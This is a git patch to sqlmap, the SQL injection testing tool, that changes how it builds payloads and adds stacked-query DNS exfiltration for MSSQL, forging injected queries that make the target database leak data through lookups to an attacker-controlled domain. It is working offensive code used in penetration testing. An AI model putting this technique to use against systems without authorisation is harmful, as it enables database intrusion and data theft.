From 2c28423cb8fd6dc6f25752c15f7bd2b062793b8f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 2 Apr 2012 14:57:15 +0000
Subject: [PATCH] minor update
---
lib/core/agent.py | 2 +-
lib/core/common.py | 3 ++-
lib/techniques/dns/use.py | 20 ++++++++++++++++++--
3 files changed, 21 insertions(+), 4 deletions(-)
diff --git a/lib/core/agent.py b/lib/core/agent.py
index 23e66495c..bbd267826 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -200,7 +200,7 @@ class Agent:
elif any([kb.injection.suffix, suffix]):
expression += " %s" % (kb.injection.suffix or suffix)
- return expression
+ return re.sub(r"(?s);\W*;", ";", expression)
def cleanupPayload(self, payload, origValue=None):
if payload is None:
diff --git a/lib/core/common.py b/lib/core/common.py
index 7c808a31c..bb5f3c44f 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1608,7 +1608,8 @@ def getSPLSnippet(dbms, name, **variables):
checkFile(filename)
retVal = readCachedFileContent(filename)
- retVal = re.sub(r"#.+", "", retVal).strip()
+ retVal = re.sub(r"#.+", "", retVal)
+ retVal = re.sub(r"(?s);\W+", "; ", retVal).strip()
for _ in variables.keys():
retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)
diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py
index 15f7956bc..4e5870f4c 100644
--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
@@ -13,12 +13,15 @@ import time
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
+from lib.core.common import cleanQuery
from lib.core.common import dataToStdout
from lib.core.common import decodeHexValue
from lib.core.common import extractRegexResult
from lib.core.common import getSPLSnippet
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
+from lib.core.common import pushValue
+from lib.core.common import popValue
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import safecharencode
@@ -29,6 +32,7 @@ from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
+from lib.core.enums import PAYLOAD
from lib.core.settings import MAX_DNS_LABEL
from lib.core.settings import PARTIAL_VALUE_MARKER
from lib.core.unescaper import unescaper
@@ -53,6 +57,7 @@ def dnsUse(payload, expression):
if output is None:
kb.dnsMode = True
+ pushValue(kb.technique)
while True:
count += 1
@@ -67,8 +72,18 @@ def dnsUse(payload, expression):
expressionRequest = getSPLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain)
expressionUnescaped = unescaper.unescape(expressionRequest)
- forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
- Request.queryPage(forgedPayload, content=False, raise404=False)
+
+ if Backend.isDbms(DBMS.MSSQL):
+ kb.technique = PAYLOAD.TECHNIQUE.STACKED
+ expression = cleanQuery(expression)
+
+ comment = queries[Backend.getIdentifiedDbms()].comment.query
+ query = agent.prefixQuery("; %s" % expressionUnescaped)
+ query = agent.suffixQuery("%s;%s" % (query, comment))
+ forgedPayload = agent.payload(newValue=query)
+ else:
+ forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
+ Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)
_ = conf.dnsServer.pop(prefix, suffix)
if _:
@@ -81,6 +96,7 @@ def dnsUse(payload, expression):
else:
break
+ kb.technique = popValue()
kb.dnsMode = False
if output is not None: